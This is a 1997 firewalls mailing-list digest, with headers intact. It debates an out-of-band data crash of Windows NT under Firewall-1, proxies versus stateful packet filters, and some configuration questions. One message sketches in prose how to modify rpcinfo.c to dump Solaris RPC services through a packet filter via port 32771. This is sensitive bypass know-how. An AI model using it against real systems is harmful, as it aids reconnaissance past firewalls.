On Thu, 5 Jun 1997, Daniel Strawson wrote: > > Hang on a moment. > > Let me put this in perspective. > > As I understand it, this problem results from sending packets with a > particular IP option set in the header. (Please confirm I'm right here > someone). > > Firewall _SHOULD_ drop all packets with IP options set. This would mean > that all Firewall-1 systems and systems behind Firewall-1 are impervious > to this attack. (something for Checkpoint to be proud of). > > Unfortunately this is not the case - as I say I've managed to get NT to > crash with FW-1 installed. > > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > crash, you get the NT system that it is running on to crash, so it is not > an insecurity, but a claimed feature that doesn't work. > > So, either - > > - The IP Options drop code in FW-1 doesn't work. > > or > > - I do not properly understand this attack and it does not work as I > imagine - in this case, please correct me. > > Cheers, > > Daniel > > > > On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > > > On Wed, 4 Jun 1997, Daniel Strawson wrote: > > > > > We tried it and, yes we managed to crash an NT based Firewall-1 system. > > > This is odd since (if memory serves) the packets should be dropped on the > > > floor by the stateful inspection module. > > > > You mean you can crash an NT FW-1 by sending OOB data to it?! > > That's scary if it is true and should be addressed by Check Point ASAP! > > > > What I have always thought of FW-1 is that it operates at quite low level > > inside the OS kernel, that as long as you filter everything the network > > bugs in the OS don't really matter, as the packets never reach FW-1.
> > > > If sending some bytes of data to FW1 crashes it and the OS, this > > combination (FW1+NT) should not be used as a firewall solution at all. May > > be someone from CP could explain, how much do the bugs in the OS matter > > once FW1 is installed. > > > > Jüri > > > > > >
From owner-firewalls-outgoing Thu Jun 5 21:31:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20262 for firewalls-outgoing; Thu, 5 Jun 1997 10:37:50 -0700 (PDT) Received: from interlock.reston.ans.net (interlock.reston.ans.net [192.77.167.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA20232 for ; Thu, 5 Jun 1997 10:37:41 -0700 (PDT) Received: by interlock.reston.ans.net id AA23817 (InterLock SMTP Gateway 3.0 for firewalls@greatcircle.com); Thu, 5 Jun 1997 13:40:31 -0400 Message-Id: <199706051740.AA23817@interlock.reston.ans.net> From: "Conrad Minor" To: "Jyri Kaljundi" , "Bryan D. Boyle" Cc: Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts Date: Thu, 5 Jun 1997 13:39:32 -0400 X-Msmail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1161 Mime-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
All, This of course doesn't address the problem with the FW1. It is just to refute the notion that NT is a completely closed OS. Any firewall worth its salt won't be running the native NT stack unmodified. How for example would you plumb something like stateful inspection onto an NT box without kernel changes? There are several methods of modifying the stack to harden it against attack or change the way it operates. The first would be to shim the stack, i.e. putting a driver between the Ethernet card drivers and the stack itself. NT has built in support for this. Just read the DDK documentation.
NT 4.0 has even better support than 3.51 since Msoft has added calls that let you dynamically hook into the NDIS stuff. This is in fact how RAS is implemented (NDISWAN). Another option of course is to replace the TCP stack altogether. Centri from Global Internet does that. Check out their web page. They completely bypass the microsoft stack by building their own proprietary stack which intercepts all packets coming to the firewall. They optionally will pass packets to the Msoft stack depending on how your rules are configured. Packet filter firewalls don't even need a TCP stack. Just hooks into the NDIS routines that handle the reception and distribution of packets. Probably could do this with another SHIM. All of this is documented by Microsoft. The source code for sample drivers is available as part of the DDK. While there are no sample SHIM drivers, a buddy and I created one for NT3.51 in about a month. It was really a matter of combining an existing ethernet driver with an existing protocol driver and making them talk to each other. NT even has source level debugging at the kernel layer. Name some UNIX boxes that support that (not to suggest that one is better than the other, just that NT kernel work is easier. Streams are pretty damn elegant). Conrad
---------- > From: Bryan D. Boyle > To: Jyri Kaljundi > Cc: firewalls@greatcircle.com > Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts > Date: Thursday, June 05, 1997 9:46 AM > > At 03:08 PM 6/5/97 +0300, you wrote: > > >You mean you can crash an NT FW-1 by sending OOB data to it?! > >That's scary if it is true and should be addressed by Check Point ASAP! > > > > It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, > since the OS is not in their control. They can only operate (or be as > secure as) at the least common denominator level of the underlying OS.
> > >What I have always thought of FW-1 is that it operates at quite low level > >inside the OS kernel, that as long as you filter everything the network > >bugs in the OS don't really matter, as the packets never reach FW-1. > > Nothing except MS code operates in the NT kernel. This problem is with > what happens when you send oob data to a stack (MS) that is tightly integrated > with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS > interface and control mechanism itself is crap. > > Of course, on UN*X systems, this is not the case. This is a signal example > of the difference between designing for peer review of your security model > and designing for what gets good trade publication reviews. > > > > >If sending some bytes of data to FW1 crashes it and the OS, this > >combination (FW1+NT) should not be used as a firewall solution at all. May > >be someone from CP could explain, how much do the bugs in the OS matter > >once FW1 is installed. > > If there is an overall architectural problem with NT as it is, then the OS > bugs matter A LOT. But, of course, those that say you can trust a black box > solution since the vendors are trustworthy are quite quiet on this regard... > > I would agree that you should ignore NT as an OS platform in a > security solution right now. Just my opinion, $.02 US, etc. > > Flames to /dev/null. > -- > Bryan D. Boyle | LOGICAL: bdboyle@att.com 201-386-8584 > #include | VIRTUAL: http://www.access.digex.net/~bdboyle > AT&T Laboratories, Inc. | PHYSICAL: Whippany, NJ > | HISTORICAL: HQ, 6th Battalion, Army of No. VA. > "What country can preserve its liberties, if its rulers are not warned > from time to time, that its people preserve the spirit of resistance?" 
> -Thomas Jefferson, 1787
From owner-firewalls-outgoing Thu Jun 5 21:46:02 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA15928 for firewalls-outgoing; Thu, 5 Jun 1997 12:58:42 -0700 (PDT) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id MAA15833 for firewalls@greatcircle.com; Thu, 5 Jun 1997 12:58:16 -0700 (PDT) Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA06551 for ; Tue, 3 Jun 1997 08:38:46 -0700 (PDT) Received: from Mailhub by garanti1.garanti.com.tr id AA05948; Tue, 3 Jun 1997 18:41:52 +0400 Received: from GarantiUser by GarantiMailServer id AA11228; Tue, 3 Jun 1997 18:39:52 +0400 Received: from [10.0.4.106] by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA36014; Tue, 3 Jun 1997 18:38:28 +0400 Message-Id: <3394C7E5.5F51@garanti.com.tr> Date: Tue, 03 Jun 1997 18:41:58 -0700 From: Cihan Subasi Reply-To: csubasi@garanti.com.tr Organization: Garanti Ticaret X-Mailer: Mozilla 3.0Gold (Win16; I) Mime-Version: 1.0 To: Firewall Mailing List Subject: HELp on SNG config... Content-Type: text/plain; charset=iso-8859-9 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
For the first time I have to configure NAT on SNG.. one of our internal web servers will be visible to the outside... But there is not much in the manual, Reserve addresses and Mapping, I have already done those but still I guess something is missing. Can anybody help me on that?
Thanks -- *************************************************************** Cihan Subasi Garanti Ticaret, Istanbul Turkey email= cihans@garanti.com.tr or csubasi@garanti.com.tr Phone= +902126570404 Fax = +902126570473 ***************************************************************
From owner-firewalls-outgoing Thu Jun 5 22:11:34 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA03337 for firewalls-outgoing; Thu, 5 Jun 1997 09:00:32 -0700 (PDT) Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id IAA03046 for ; Thu, 5 Jun 1997 08:59:27 -0700 (PDT) Received: from Mailhub by garanti1.garanti.com.tr id AA19722; Thu, 5 Jun 1997 19:04:09 +0400 Received: from GarantiUser by GarantiMailServer id AA10788; Thu, 5 Jun 1997 19:03:25 +0400 Received: from fw1.fw.garanti.com.tr by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA34554; Thu, 5 Jun 1997 19:01:49 +0400 Message-Id: <33977065.5FC5@garanti.com.tr> Date: Thu, 05 Jun 1997 19:05:25 -0700 From: Cihan Subasi Reply-To: csubasi@garanti.com.tr Organization: Garanti Ticaret X-Mailer: Mozilla 3.0Gold (Win16; I) Mime-Version: 1.0 To: Firewall Mailing List Subject: Unknown log entry... Content-Type: text/plain; charset=iso-8859-9 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
I had these two lines in my firewall logs; can anybody explain to me what they are?
--------------------------------------------------
Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for "66.3.196.208.in-addr.arpa IN PTR", got type "CNAME"
Jun 2 20:30:49 fw1 sendmail[16650]: gethostby*.getanswer: asked for "66.3.196.208.in-addr.arpa", got "66.64.3.196.208.in-addr.arpa"
--------------------------------------------------
Thanks, *************************************************************** Cihan Subasi Garanti Ticaret, Istanbul Turkey email= cihans@garanti.com.tr or csubasi@garanti.com.tr Phone= +902126570404 Fax = +902126570473 ***************************************************************
From owner-firewalls-outgoing Thu Jun 5 22:14:48 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA10136 for firewalls-outgoing; Thu, 5 Jun 1997 20:39:19 -0700 (PDT) Received: from pebbles.gtri.gatech.edu (pebbles.gtri.gatech.edu [130.207.204.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA10107 for ; Thu, 5 Jun 1997 20:39:08 -0700 (PDT) Received: from jones (102-thomaston.alltel.net [206.229.146.102]) by pebbles.gtri.gatech.edu (8.8.5/8.8.5) with SMTP id XAA16853; Thu, 5 Jun 1997 23:44:33 -0400 (EDT) Message-Id: <199706060344.XAA16853@pebbles.gtri.gatech.edu> Comments: Authenticated sender is From: "Jim Jones" To: Firewall Mailing List , csubasi@garanti.com.tr Date: Thu, 5 Jun 1997 23:43:34 +0000 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: Limiting Mail size.. In-reply-to: <339773DE.3884@garanti.com.tr> X-mailer: Pegasus Mail for Win32 (v2.52) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Sendmail? Use the delivery agent M= equate, set it for any delivery agents you want to limit. (page 388 of my now old Costales "Sendmail" book). Or use checkcompat(). (page 195 of same).
-Jim > Date: Thu, 05 Jun 1997 19:20:14 -0700 > From: Cihan Subasi > Reply-to: csubasi@garanti.com.tr > Organization: Garanti Ticaret > To: Firewall Mailing List > Subject: Limiting Mail size.. > It is out of topic but how can I limit inbound and outbound email > size... > > Thanks, > -- > > > *************************************************************** > Cihan Subasi > Garanti Ticaret, Istanbul Turkey > > email= cihans@garanti.com.tr or csubasi@garanti.com.tr > Phone= +902126570404 > Fax = +902126570473 > *************************************************************** > > From owner-firewalls-outgoing Thu Jun 5 22:30:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA04890 for firewalls-outgoing; Thu, 5 Jun 1997 14:45:26 -0700 (PDT) Received: from nimue.jammed.com (jammed.com [165.227.120.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id OAA04879 for ; Thu, 5 Jun 1997 14:45:19 -0700 (PDT) Received: (from deadmail@localhost) by nimue.jammed.com (8.8.5/8.8.5) id OAA18829 for firewalls@greatcircle.com; Thu, 5 Jun 1997 14:49:15 -0700 Received: from nimue.jammed.com (gate.jammed.com) by gate.jammed.com (deadmail-1.1/JAMMED) via SMTP; Thu Jun 5 14:49:15 1997 Date: Thu, 5 Jun 1997 14:49:13 -0700 (PDT) From: "James W. Abendschan" To: firewalls@greatcircle.com Subject: Re: [SNI-14]: Solaris rpcbind vulnerability (fwd) Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 4 Jun 1997, Oliver Friedrichs wrote: > Secure Networks Inc. > > Security Advisory > June 4, 1997 > > Solaris rpcbind weaknesses [ ... ] When I saw this a few weeks ago on SNI's web page (it wasn't published as an advisory, it was published as one of the checks their Ballista tool performs) I was intrigued, so I sat down and spent some time trying to exploit this. 
By modifying rpcinfo.c to connect to port 32771 and changing the PMAPPROC_DUMP stuff to work over UDP instead of TCP (clntudp_create), you can get nicely functional "over-the-packet-filter" rpc dump. If there's interest, I'll post diffs. Now the *real* trick is figuring out how to get Solaris NFS to give up its export list over another high-numbered port.. James -- James W. Abendschan jwa@jammed.com JAMMED Systems, Inc. http://www.jammed.com "Turing," she said. "You are under arrest." -- William Gibson From owner-firewalls-outgoing Thu Jun 5 22:39:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA09770 for firewalls-outgoing; Thu, 5 Jun 1997 09:40:18 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA09727 for ; Thu, 5 Jun 1997 09:39:55 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id MAA06916; Thu, 5 Jun 1997 12:40:33 -0400 (EDT) From: Adam Shostack Message-Id: <199706051640.MAA06916@homeport.org> Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: <199706051346.JAA02854@hogpb.ho.att.com> from "Bryan D. Boyle" at "Jun 5, 97 09:46:02 am" To: bdboyle@att.com (Bryan D. Boyle) Date: Thu, 5 Jun 1997 12:40:33 -0400 (EDT) Cc: jk@stallion.ee, firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk A friend suggests that the problem may be that the FW1 is passing code upwards to the NT stack. FW1 sits beneath the stack, and intercepts packets before they can do damage. However, if you configure the firewall to allow packets to the NT stack, then NT will crash. 
I'll point out that if this is so, then an Application Proxy* probably would not exhibit the same behavior, since it would rebuild the IP packet, instead of sending the OOB packet on to its destination when it hits an "OK" rule. Adam * Application Proxy in the archetypal sense. I have not tested any to see how they handle this.
Bryan D. Boyle wrote: | At 03:08 PM 6/5/97 +0300, you wrote: | | >You mean you can crash an NT FW-1 by sending OOB data to it?! | >That's scary if it is true and should be addressed by Check Point ASAP! | > | | It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, | since the OS is not in their control. They can only operate (or be as | secure as) at the least common denominator level of the underlying OS.
-- "It is seldom that liberty of any kind is lost all at once." -Hume
From owner-firewalls-outgoing Thu Jun 5 22:39:32 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06303 for firewalls-outgoing; Thu, 5 Jun 1997 12:04:37 -0700 (PDT) Received: from newfed.frb.gov (newfed.frb.gov [198.3.221.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA06259 for ; Thu, 5 Jun 1997 12:04:26 -0700 (PDT) Received: from FRB.GOV (umailfwd@localhost) by newfed.frb.gov (8.8.5/8.8.5) with UUCP id OAA28402; Thu, 5 Jun 1997 14:37:06 -0400 (EDT) Received: from kryten.frb.gov by frbgate.FRB.GOV (4.1/SMI-4.0) id AA19185; Thu, 5 Jun 97 14:42:53 EDT Received: from localhost.frb.gov (localhost.frb.gov [127.0.0.1]) by kryten.frb.gov (8.8.5/8.8.5) with SMTP id OAA09090; Thu, 5 Jun 1997 14:42:53 -0400 (EDT) Message-Id: <199706051842.OAA09090@kryten.frb.gov> X-Authentication-Warning: kryten.frb.gov: localhost.frb.gov [127.0.0.1] didn't use HELO protocol X-Mailer: exmh version 1.6.5 12/11/95 To: Cy Ardoin Cc: "Jonathan M. Bresler" , Firewalls@GreatCircle.COM Subject: Re: PIX and FW-1 (packet filter Question) In-Reply-To: Your message of "Thu, 05 Jun 1997 14:11:33 EDT."
Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 05 Jun 1997 14:42:53 -0400 From: "Jonathan M. Bresler" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
>On Thu, 5 Jun 1997, Jonathan M. Bresler wrote: > >> >> >I don't think there is anything an application firewall can >> >do that can't also be done by a "packet filter" firewall. The >> >> trivial example: >> a smtp application level proxy can disable the "debug" command >> for every sendmail behind that firewall. > >Finding and removing the "debug" command from smtp connections at the >packet layer isn't much different than finding and altering the PORT and >PASV part of the FTP command and all the NAT style packet filters >modify the FTP commands. It's not something packet filters do, but >it is no more difficult than many of the things they already do.
Cy, the difficulty of implementing this is not the point. The point is that application level proxies provide this. Packet filters, stateful or not, do not provide this. Ain't hard to apply a tourniquet, but until it's applied, someone bleeds to death ;) jmb
From owner-firewalls-outgoing Thu Jun 5 23:57:09 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA21761 for firewalls-outgoing; Thu, 5 Jun 1997 13:34:04 -0700 (PDT) Received: from firewall2.Lehman.COM (firewall.Lehman.COM [192.147.65.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA21589 for ; Thu, 5 Jun 1997 13:33:20 -0700 (PDT) From: carson@lehman.com Received: (from smap@localhost) by firewall2.Lehman.COM (8.8.5/8.6.12) id QAA12145; Thu, 5 Jun 1997 16:37:04 -0400 (EDT) Received: from unknown(146.127.39.20) by firewall2 via smap (V1.3) id tmp012125; Thu Jun 5 16:36:59 1997 Received: from kublai.lehman.com by relay.lehman.com (4.1/LB-0.6) id AA08264; Thu, 5 Jun 97 16:36:58 EDT Received: from dragon.lehman.com by kublai.lehman.com (4.1/Lehman Bros.
V1.6) id AA10604; Thu, 5 Jun 97 16:36:54 EDT Received: by dragon.lehman.com (SMI-8.6/Lehman Bros. V1.5) id QAA19850; Thu, 5 Jun 1997 16:36:54 -0400 Date: Thu, 5 Jun 1997 16:36:54 -0400 Message-Id: <199706052036.QAA19850@dragon.lehman.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Anton J Aylward Cc: Bernd Eckenfels , firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-Reply-To: <3.0.32.19970605082442.0094c5f0@the-wire.com> References: <3.0.32.19970605082442.0094c5f0@the-wire.com> X-Mailer: VM 6.27 under 20.1 XEmacs Lucid (beta8) Reply-To: carson@lehman.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> "Anton" == Anton J Aylward writes: Anton> I believe this is a problem in information content. The HOST Anton> command, as Bernd says, is not implemented widely enough to make it Anton> practical. The people who talk about kernel hack support for a Anton> plug-gw solution have not made it clear how the lost information is Anton> to be regenerated. It's never lost in the first place. You set up static NAT and have the firewall as the route for that subnet. It's just like using virtual interfaces (and consumes that same amount of address space). The only other way of doing things is to assume that the Host: header is present, and provide a "which site did you _really_ mean" page/script for queries lacking said header. 
-- -- Carson Gaspar -- carson@cs.columbia.edu carson@lehman.com http://www.cs.columbia.edu/~carson/home.html
From owner-firewalls-outgoing Fri Jun 6 00:16:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA02774 for firewalls-outgoing; Thu, 5 Jun 1997 08:58:08 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA02634 for ; Thu, 5 Jun 1997 08:57:42 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id LAA01436; Thu, 5 Jun 1997 11:01:49 -0500 Date: Thu, 5 Jun 1997 11:01:48 -0500 From: Craig Brozefsky Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts To: Daniel Strawson cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
On Thu, 5 Jun 1997, Daniel Strawson wrote: > Hang on a moment. > > Let me put this in perspective. > > As I understand it, this problem results from sending packets with a > particular IP option set in the header. (Please confirm I'm right here > someone). > > Firewall _SHOULD_ drop all packets with IP options set. This would mean > that all Firewall-1 systems and systems behind Firewall-1 are impervious > to this attack. (something for Checkpoint to be proud of).
Uhm, I don't have any RFCs or source code in front of me right now, but my understanding was that several options would need to get through, OOB being one of them, as some applications make use of it, telnet for instance if I'm not mistaken (though I may be and invite correction).
> Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > crash, you get the NT system that it is running on to crash, so it is not > an insecurity, but a claimed feature that doesn't work.
Not how I would interpret it.
I would consider this the responsibility of the FW vendor. They are responsible for the TCP/IP stack IMO. If they aren't replacing it, then they are assuming the OS vendor is competent, not something I would agree with. Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash)
From owner-firewalls-outgoing Fri Jun 6 00:31:30 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id AAA19746 for firewalls-outgoing; Fri, 6 Jun 1997 00:17:52 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id AAA19699 for ; Fri, 6 Jun 1997 00:17:41 -0700 (PDT) Received: from smtp1.sybase.com (sybgate.sybase.com [130.214.220.35]) by halon.sybase.com (8.8.4/8.8.4) with SMTP id AAA01188 for ; Fri, 6 Jun 1997 00:25:12 -0700 (PDT) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) id AA09552; Fri, 6 Jun 97 00:23:30 PDT Received: (from unixsvr1@localhost) by notesgw2.sybase.com (8.8.4/8.8.4) id AAA16788 for @sybgate.sybase.com:firewalls@greatcircle.com; Fri, 6 Jun 1997 00:22:22 -0700 (PDT) Message-Id: <199706060722.AAA16788@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id 37EDCDE84B0420CE882564AE0028F002; Fri, 6 Jun 97 00:22:22 EDT To: firewalls From: Ryan Russell/SYBASE Date: 6 Jun 97 0:29:07 EDT Subject: Stateful Packet Filters vs. Proxies Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Well, I finally got around to writing down my arguments on the above subject. Check it out at: http://futon.sfsu.edu/~rrussell/spfvprox.htm Warning: It's lengthy. Comments welcome.
Ryan
From owner-firewalls-outgoing Fri Jun 6 00:46:07 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA09207 for firewalls-outgoing; Thu, 5 Jun 1997 20:33:51 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA09192 for ; Thu, 5 Jun 1997 20:33:44 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id WAA15247; Thu, 5 Jun 1997 22:38:11 -0500 Date: Thu, 5 Jun 1997 22:38:10 -0500 From: Craig Brozefsky Subject: Re: PIX and FW-1 (packet filter Question) To: Firewalls@GreatCircle.COM In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
On Thu, 5 Jun 1997, Cy Ardoin wrote: > On Thu, 5 Jun 1997, Jonathan M. Bresler wrote: > > > > > >I don't think there is anything an application firewall can > > >do that can't also be done by a "packet filter" firewall. The > > > > trivial example: > > a smtp application level proxy can disable the "debug" command > > for every sendmail behind that firewall. > > Finding and removing the "debug" command from smtp connections at the > packet layer isn't much different than finding and altering the PORT and > PASV part of the FTP command and all the NAT style packet filters > modify the FTP commands. It's not something packet filters do, but > it is no more difficult than many of the things they already do.
Uhm, how about providing authentication at the firewall, like SecureID (yuck) or CryptoCard, or even just APOP for a POP3 proxy? How about providing an SMTP daemon capable of accepting mail, but not requiring anything more than putting it into a directory for another, non-privileged daemon to forward to a full-featured MTA that is inaccessible to the outside world?
This SMTP daemon on the firewall being a very simple beast and leaving much less room for fuckup in code and design than, let's say, letting packets go through to a full-featured MTA, like uhm, sendmail maybe or Exchange, or Netscape's Mail Server, and having to modify your packet filter to block out attacks as they are published. Surely a lot more work than putting SMAPD on your firewall and not having to worry about tracking bugs in your full MTA (or at least a very large class of bugs). Or filter HTTP based on MIME type and response size. Hand waving and 'well it could' doesn't get you much of anywhere though, not to imply that this is what you're doing, but just pointing out that theory is wonderful and very useful, but when it comes to 'capabilities' assessments like this, it's often better to stay within the somewhat agreed upon realm of reality. Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash)
From owner-firewalls-outgoing Fri Jun 6 01:32:37 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA03330 for firewalls-outgoing; Thu, 5 Jun 1997 09:00:27 -0700 (PDT) Received: from brussels.cisco.com (brussels.cisco.com [171.68.129.238]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA03013 for ; Thu, 5 Jun 1997 08:59:22 -0700 (PDT) Received: from cons-evyncke.cisco.com (bru-dhcp30.cisco.com [171.68.129.144]) by brussels.cisco.com (8.8.5/8.8.5) with SMTP id RAA12463; Thu, 5 Jun 1997 17:59:16 +0200 (METDST) Message-Id: <3.0.32.19970605180152.006d0788@brussels.cisco.com> X-Sender: evyncke@brussels.cisco.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Thu, 05 Jun 1997 18:01:53 +0000 To: Daniel Strawson , Jyri Kaljundi From: Eric Vyncke Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts Cc: Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk
Daniel, Out-of-band data, also called urgent data, is a harmless option which is used in some cases (I think FTP abort and some Telnet). It is not a dangerous option like source routing, ... which by the way are not put in the fixed IP header but in the variable part of the IP header. Bottom line: out-of-band data is harmless and firewalls should allow this data to go through (and not break when finding one...). Eric
At 14:24 5/06/97 +0100, Daniel Strawson wrote: > >Hang on a moment. > >Let me put this in perspective. > >As I understand it, this problem results from sending packets with a >particular IP option set in the header. (Please confirm I'm right here >someone). > >Firewall _SHOULD_ drop all packets with IP options set. This would mean >that all Firewall-1 systems and systems behind Firewall-1 are impervious >to this attack. (something for Checkpoint to be proud of). > >Unfortunately this is not the case - as I say I've managed to get NT to >crash with FW-1 installed. > >Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to >crash, you get the NT system that it is running on to crash, so it is not >an insecurity, but a claimed feature that doesn't work. > >So, either - > > - The IP Options drop code in FW-1 doesn't work. > > or > > - I do not properly understand this attack and it does not work as I > imagine - in this case, please correct me. > >Cheers, > >Daniel > > > >On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > >> On Wed, 4 Jun 1997, Daniel Strawson wrote: >> >> > We tried it and, yes we managed to crash an NT based Firewall-1 system. >> > This is odd since (if memory serves) the packets should be dropped on the >> > floor by the stateful inspection module. >> >> You mean you can crash an NT FW-1 by sending OOB data to it?! >> That's scary if it is true and should be addressed by Check Point ASAP!
>>
>> What I have always thought of FW-1 is that it operates at quite low level
>> inside the OS kernel, that as long as you filter everything the network
>> bugs in the OS don't really matter, as the packets never reach FW-1.
>>
>> If sending some bytes of data to FW1 crashes it and the OS, this
>> combination (FW1+NT) should not be used as a firewall solution at all. May
>> be someone from CP could explain, how much do the bugs in the OS matter
>> once FW1 is installed.
>>
>> Jüri
>>
>>
>

Eric Vyncke
Technical Consultant
Cisco Systems Belgium SA/NV
Phone: +32-2-778.4677
Fax: +32-2-778.4300
E-mail: evyncke@cisco.com
Mobile: +32-75-312.458

From owner-firewalls-outgoing Fri Jun 6 01:37:53 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA04321 for firewalls-outgoing; Thu, 5 Jun 1997 20:12:01 -0700 (PDT)
Received: from www.valuu.net (www.valuu.net [204.252.40.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA04222 for ; Thu, 5 Jun 1997 20:11:39 -0700 (PDT)
Received: from fd.valuu.net ([204.252.40.3]) by www.valuu.net (post.office MTA v1.9.1 ID# 0-11837) with SMTP id AAA430 for ; Thu, 5 Jun 1997 23:17:36 -0400
Received: by fd.valuu.net with Microsoft Mail id <01BC7206.0E15A100@fd.valuu.net>; Thu, 5 Jun 1997 23:13:19 -0400
Message-ID: <01BC7206.0E15A100@fd.valuu.net>
From: rabbi@www.valuu.net (Rabbi Haim Cassorla)
To: "'firewalls@GreatCircle.COM'"
Subject: FW: [FW1] Out of Band Data Attack against NT-Hosts
Date: Thu, 5 Jun 1997 23:13:17 -0400
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Microsoft has a fix for OOB which can only be applied after SP3 for NT4. Both SP3 and the OOB Fix are available at their FTP site.

Shalom
Rabbi

----------
From: Pete Vickers[SMTP:pvickers@adtranz-signal.co.uk]
Sent: Thursday, June 05, 1997 2:05 PM
